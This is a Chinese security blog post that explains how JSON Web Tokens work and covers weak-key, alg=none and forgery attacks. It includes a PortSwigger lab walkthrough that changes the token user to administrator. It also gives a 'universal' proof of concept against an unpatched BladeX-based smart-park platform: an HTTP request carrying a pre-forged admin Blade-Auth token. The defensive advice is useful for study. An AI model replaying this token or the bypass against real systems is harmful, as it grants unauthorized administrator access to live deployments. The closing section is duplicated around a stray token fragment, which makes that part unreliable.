JWT原理解析与实战通杀(附带POC)

已于 2024-07-09 00:49:01 修改
阅读量702 收藏 14
点赞数 8
分类专栏: WEB安全 文章标签: web安全 JWT 网络安全
于 2024-07-09 00:47:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LCW991207/article/details/140282051
版权

JWT原理解析与实战通杀(附带POC)

奉天安全团队(www.ftsec.cn)-Liku
奉天出品,必属精品。
转载请标明出处

JWT的原理

什么是JWT

JWT(JSON Web Token)是一种用于在各方之间作为JSON对象安全地传输信息的开放标准。信息可以被验证和信任,因为它是经过数字签名的。JWT通常用于身份验证和信息交换。

JWT由三个部分组成,用点号(.)分隔:

  1. Header(头部)
  2. Payload(负载)
  3. Signature(签名)

这三个部分分别进行Base64Url编码后,用点号(.)连接在一起构成一个JWT。

知识补充:Base64Url和Base64

Base64Url编码是Base64编码的一种变体,专门用于URL和文件名中,以避免特殊字符带来的问题。它与标准的Base64编码的主要区别在于字符集和填充字符。

  1. 字符集不同

    • 标准Base64编码使用字符+/
    • Base64Url编码使用字符-_,以避免URL中的特殊字符问题。

  2. 去掉填充字符

    • 标准Base64编码通常使用=作为填充字符,以确保编码后的字符串长度是4的倍数。
    • Base64Url编码则去掉了填充字符=,从而避免了URL解析中的问题。

Header

Header通常包含两个部分:签名算法和令牌类型。例如:

{
  "alg": "HS256",
  "typ": "JWT"
}

这个头部表示使用HMAC SHA-256算法签名,并声明这是一个JWT。

Payload

Payload是JWT的主体部分,包含声明(claims)。声明是有关实体(通常是用户)和其他数据的声明。声明分为三类:

  • Registered claims(注册声明)
  • Public claims(公共声明)
  • Private claims(私有声明)

例如:

{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1516239022
}

Signature

签名部分用于验证消息在传输过程中是否未被篡改。签名是用header中指定的算法生成的,包括编码后的header、编码后的payload和一个密钥。例如,对于HMAC SHA-256算法,签名如下:

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  secret
)

举例(JWT完整流程)

假设你现在有一个应用,需要用户登录后获取访问权限。

1. 用户登录

用户在登录页面输入用户名和密码,点击登录。服务器接收到登录请求并验证用户的凭证。

2. 生成JWT

如果用户的凭证(账号密码)正确,服务器将生成一个JWT。假如服务器将生成的JWT为:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

让我们详细分解这个JWT的生成过程,一共三个部分,每个部分被点号(.)截断

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9

在这里插入图片描述

base64url解码一下得到

{
  "alg": "HS256",
  "typ": "JWT"
}

这个头部表示我们将使用HMAC SHA-256算法进行签名,并且这是一个JWT。

第二部分:Payload

eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ

base64url解码一下得到

在这里插入图片描述

{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1516239022
}

这个负载部分包含了一些声明,比如用户ID(sub)、用户名(name)和签发时间(iat)。

第三部分:Signature

SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

第三部分签名的生成是由第一部分和第二部分组成的

我们使用密钥(secret)来生成签名。签名是使用以下方法生成的:

  1. 将编码后的Header和Payload用点号(.)连接在一起:

    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ

  2. 使用HMAC SHA-256算法和密钥secret对上述字符串进行签名:

    import hmac
import hashlib
import base64

header_payload = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ"
secret = "secret"
signature = hmac.new(secret.encode(), header_payload.encode(), hashlib.sha256).digest()
signature_base64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()
print(signature_base64)

    生成的第三部分签名是:

    SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

最后,将编码后的Header、Payload和生成的Signature用点号(.)连接在一起,形成完整的JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

3. 返回JWT

服务器将生成的JWT返回给客户端。客户端可以将JWT存储在本地存储(Local Storage)或Cookie中。

4. 携带JWT进行请求

在用户登录后的每次请求中,客户端会在请求头中携带JWT,例如:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

5. 服务器验证JWT

服务器接收到请求后,会验证JWT的签名是否正确。验证过程如下:

  1. 从JWT中提取出header和payload部分。
  2. 使用同样的签名密钥和header中的算法,重新生成签名。
  3. 将重新生成的签名与JWT中的签名进行比较,如果相同,则验证通过。

6. 响应请求

如果JWT有效且未过期,服务器处理请求并返回响应。

在线平台

JWT在线构造和解构的平台:
https://jwt.io/

在这里插入图片描述

JWT攻防

常见攻击方法

  1. 暴力破解签名密钥:攻击者可以使用暴力破解的方法猜测JWT的签名密钥。如果签名密钥比较弱,这种攻击可能会成功。
  2. 算法替换攻击:如果服务器在验证JWT时不严格检查头部的alg字段,攻击者可以将alg字段改为none,绕过签名验证。
  3. 伪造Token:如果服务器使用对称加密算法(如HS256),并且密钥泄露,攻击者可以使用密钥伪造有效的JWT。

靶场

靶场一:实验室:通过未经验证的签名绕过 JWT 身份验证 |网络安全学院 (portswigger.net)

在这里插入图片描述

根据题目要求得知,需使用账号+密码:wiener : peter登录,后访问/admin页面,根据要求删除carlos用户即可通关。

在这里插入图片描述

登录成功后,在bp里面看数据包,可发现JWT数据。

在这里插入图片描述

来这里解码一下JSON Web Tokens - jwt.io

在这里插入图片描述

发现Payload中当前登录用户为wiener。改包请求为/admin

在这里插入图片描述

意思就是只允许administrator访问

那将JWT数据中Payload的wiener修改成administrator后继续尝试请求。

在这里插入图片描述

在这里插入图片描述

/admin/delele?username=colos 删除用户

在这里插入图片描述

实战通杀(附带POC)

某智慧园区管理平台,因为还没有修复,这里就打码了。

在这里插入图片描述

一眼顶真,用的blade的框架,

在这里插入图片描述

poc:

GET /api/blade-user/info HTTP/1.1
Host: ***
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ

在这里插入图片描述

分析一下这个poc

解析JWT中的Header、Payload和Signature来了解其内容和含义。一步一步来分解和解释这个JWT。

1. 分离JWT的各个部分

JWT由三部分组成:Header、Payload和Signature,这些部分通过点号(.)分隔。给定的JWT是:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ

分离后得到:

  • Header:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
  • Payload:eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0
  • Signature:RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ

2. 解码Base64Url

使用Base64Url解码Header和Payload:

Header
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9

解码后得到:

{
  "alg": "HS256",
  "typ": "JWT"
}
Payload
eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0

解码后得到:

{
  "tenant_id": "000000",
  "user_name": "admin",
  "real_name": "管理员",
  "authorities": ["administrator"],
  "client_id": "saber",
  "role_name": "administrator",
  "license": "powered by bladex",
  "post_id": "1123598817738675201",
  "user_id": "1123598821738675201",
  "role_id": "1123598816738675201",
  "scope": ["all"],
  "nick_name": "管理员",
  "oauth_id": "",
  "detail": {
    "type": "web"
  },
  "account": "admin"
}

3. 分析解码后的数据

Header部分

Header部分指定了JWT的元数据:

  • alg:签名算法,这里是HS256(HMAC SHA-256)
  • typ:令牌类型,这里是JWT
Payload部分

Payload部分包含了JWT的实际数据,包含多个字段:

  • tenant_id: “000000” - 租户ID
  • user_name: “admin” - 用户名
  • real_name: “管理员” - 真实姓名
  • authorities: [“administrator”] - 权限列表,这里是administrator
  • client_id: “saber” - 客户端ID
  • role_name: “administrator” - 角色名
  • license: “powered by bladex” - 许可证信息
  • post_id: “1123598817738675201” - 职位ID
  • user_id: “1123598821738675201” - 用户ID
  • role_id: “1123598816738675201” - 角色ID
  • scope: [“all”] - 作用域
  • nick_name: “管理员” - 昵称
  • oauth_id: “” - OAuth ID
  • detail: {“type”: “web”} - 详细信息,类型为web
  • account: “admin” - 账号
Signature部分

Signature部分用于验证JWT的完整性和真实性。它是通过以下方式生成的:

  1. 将Header和Payload用点号连接起来:

    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0

  2. 使用HMAC SHA-256算法和一个密钥对上述字符串进行签名,生成Signature。

Signature的计算需要密钥,而给定的JWT并未提供密钥,因此不能验证这个JWT的Signature部分。

没密钥!!! 下播

防御措施

  1. 使用强密钥:确保签名密钥足够强,难以被暴力破解。
  2. 严格验证算法:在服务器端严格验证alg字段,拒绝none算法。
  3. 使用非对称加密:使用非对称加密算法(如RS256),即使公钥泄露,攻击者也无法伪造JWT。
  4. 定期更换密钥:定期更换签名密钥以增加安全性。
  5. 设置适当的过期时间:设置合理的JWT过期时间,减少被盗用的风险。

ZWIifSwiYWNjb3VudCI6ImFkbWluIn0

  1. 使用HMAC SHA-256算法和一个密钥对上述字符串进行签名,生成Signature。

Signature的计算需要密钥,而给定的JWT并未提供密钥,因此不能验证这个JWT的Signature部分。

没密钥!!! 下播

防御措施

  1. 使用强密钥:确保签名密钥足够强,难以被暴力破解。
  2. 严格验证算法:在服务器端严格验证alg字段,拒绝none算法。
  3. 使用非对称加密:使用非对称加密算法(如RS256),即使公钥泄露,攻击者也无法伪造JWT。
  4. 定期更换密钥:定期更换签名密钥以增加安全性。
  5. 设置适当的过期时间:设置合理的JWT过期时间,减少被盗用的风险。

通过了解JWT的工作原理和常见的渗透手段,可以有效地加强JWT的安全性,防止信息泄露和未经授权的访问。

是liku不是里库
关注
  • 8
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JWT原理解析与实现
weixin_46120888的博客
12-26 4417
1.Token与Session优缺点概述 1.1 Session的由来 在登录一个网站进行访问时由于HTTP协议是无状态的就是说一次HTTP请求后他就会被销毁,比如我在www.a.com/login里面登录了,然后你就要访问别的了比如要访问www.a.com/index但是你访问这个网站你就得再发一次HTTP请求,至于说之前的请求跟现在没关,不会有任何记忆,这次访问会失败,因为无法验证你的身份。所以你登录完之后每次在请求上都得带上账号密码等验证身份的信息,但是你天天这么带,那太麻烦了。那还可以这样,把我第一
签发JWT,验证JWT,解析JWT字符串
07-06
签发JWT,验证JWT,解析JWT字符串
JWTJWT原理解析及实际使用
qq_38658567的博客
08-06 9258
一、JWT 1、JWT介绍 JWT(json web token)是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准。 JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源。比如用户登录。在传统的用户登录认证中,因为http是无状态的,所以都是采用session方式。用户登录成功,服务端会保存一个session,服务端会返回给客户端一个sessionId,客户端会把sessionId保存在cookie中,每次请求都会携带这个sessionId。
JWT原理解析
诺浅的专栏
05-14 2124
什么是JWT JSON Web Token(JWT),是一个开放安全的行业标准,用于多个系统之间传递安全可靠的信息. 为什么会有JWT 在很久很久以前…常见的访问模式是这种的。 这个时候因为用户都是通过电脑上的浏览器访问服务端,而由于浏览器有cookie机制,服务端有session机制,所以这个流程是行得通的,伪流程如下 随着乔布斯时代的来临,智能手机,微信小程序等用户终端越来越多,服务端需要...
JWT原理详解
weixin_45839321的博客
10-06 1万+
1.COOKIE使用和优缺点 1.1cookie原理:用户名+密码 cookie是保存在用户浏览器端,用户名和密码等明文信息 1.2 session使用原理 session是存储在服务器端的一段字符串,相当于字典的key 1.用户向服务器发送用户名和密码。 2.验证服务器后,相关数据(如用户角色,登录时间等)将保存在当前会话中。 3.服务器向用户返回session_id,session信息都会写入到用户的Cookie。 4.用户的每个后续请求都将通过在Cookie中取出session_id传给
Springboot + JWT-Token 生成与解析
gaogzhen的博客
01-25 4106
Springboot + JWT-Token 生成与解析 目录 文章目录1、认证机制2、JWT3、springboot 集成 jwt4、JWT token在线解析***后记*** : 内容 1、认证机制 认证机制部分不在详述,可参考以下博文:几种常用的认证机制 这里我们选择 Token Auth认证的方式。 2、JWT 选择了token认证的方式,但是又不希望身份信息以明文形式传输,我们选择JWT生成token。那么JWT是什么?又又什么优势呢? 参考地址: 什么是 JWT – JSON WEB
用户登录 JWT原理剖析 JWT与单点登录实例解释
看花容易绣花难
05-01 3108
首先从用户的登录原理和实现讲起,然后引申出JWT的登录方式,在详细的讲解了JWT原理之后我们会通过案例讲解JWT是如何保存用户信息。
jwt生成token与解析token
翎墨袅
11-06 4503
jwt token
JWT详解
热门推荐
baobao的博客
07-07 27万+
本文从本人博客搬运,原文格式更加美观,可以移步原文阅读:JWT详解 JWT简介 1.什么是JWT 在介绍JWT之前,我们先来回顾一下利用token进行用户身份验证的流程: 客户端使用用户名和密码请求登录 服务端收到请求,验证用户名和密码 验证成功后,服务端会签发一个token,再把这个token返回给客户端 客户端收到token后可以把它存储起来,比如放到cookie中 客户端每次向服务端请求资源时需要携带服务端签发的token,可以在cookie或者header中携带 服务端收到请求,然后去验证客户端请
JWT安全及案例实战
来日可期的博客
09-14 1964
JWT(JSON Web Token)是一种用于在网络环境中进行身份验证和授权的开放标准。它使用 JSON 格式定义了一种安全的令牌传输格式。
JWT认证原理、流程整合springboot实战应用
01-18
在本实战应用中,我们将探讨如何将JWT与Spring Boot整合,实现安全的用户认证流程。 **JWT认证原理** JWT由三个部分组成:Header、Payload和Signature。它们通过`.`分隔,形成一个完整的Token。 1. **Header**:...
jwt的实现 ,实战项目可直接使用
07-13
3. **签名(Signature)**:为了验证 JWT 没有被篡改,头部和载荷被编码后,与一个密钥(secret)一起,通过指定的算法(在头部中定义的)计算签名。例如,`HMACSHA256(base64UrlEncode(header) + "." + base64...
Node.JS如何实现JWT原理
10-14
jwt是json web token的简称,本文介绍它的原理,最后后端用nodejs自己实现如何为客户端生成令牌token和校验token
koa+jwt实现token验证与刷新功能
10-16
在本文中,我们将深入探讨如何使用Koa2框架和JSON Web Tokens (JWT) 实现用户身份验证与令牌刷新功能。首先,JWT是一种广泛使用的身份验证机制,它允许数据在多个系统间安全传递,同时确保信息的完整性和真实性。 #...
网络安全测评技术与标准
weixin_48579910的博客
07-06 917
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
中职网络安全B模块Cenots6.8数据库
最新发布
网络安全技术分享
07-09 594
密码:root), 进入 mysql 数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的 用户,将该用户的用户名作为 flag 提交;密码:root), 进入 mysql 数据库,改变默认 mysql 管理员的名称,将系统的默认管理员 root 改为 admin,防止被列举,将操作命令作为 flag 提交。密码:root), 进入 mysql 数据库,查看所有用户及权限,找到可以从任意 IP 地址访问的 用户,使用 drop 命令将该用户删除,将操作命令作为 flag 提交。
中职网络安全Server2216
网络安全技术分享
07-09 540
黑客通过网络攻入本地服务器,通过特殊手段在系统中建立了多个异常进程,将恶意脚本的源文件所在的绝对路径作为Flag值提交;黑客在服务器某处存放了多个木马程序,请你找到此木马程序并清除木马,将木马建立连接所使用的端口号作为。只显示文件头和文件尾,因为文件头记录了开始,文件尾部记录了结束的最后一次攻击,所以筛选头和尾。黑客攻入本地服务器,请你找出黑客成功暴力破解服务器的具体时间,将暴力破解的时间范围作为。通过题目寻找异常脚本,脚本一般需要定时执行权限,所以进入定时任务目录查看定时任务。
中职网络安全wire0077数据包分析
网络安全技术分享
07-09 313
SMTPDESKTOP-M1JC4XX_2020_09_24_22_43_12.zipDESKTOP-M1JC4XX_2020_09_24_23_02_08.jpeg24 Sep 2020 23:02:09 +0000WorkingFoler-Shortcut
drf的JWT认证.doc
07-08
文档详述了JWT的背景、构成、工作原理,以及在drf项目中的具体应用步骤,包括安装、基本使用、自定义返回格式、自定义User表和认证类等高级实践。" JWT(Json Web Token)是一种轻量级的身份认证协议,广泛用于API...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是liku不是里库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值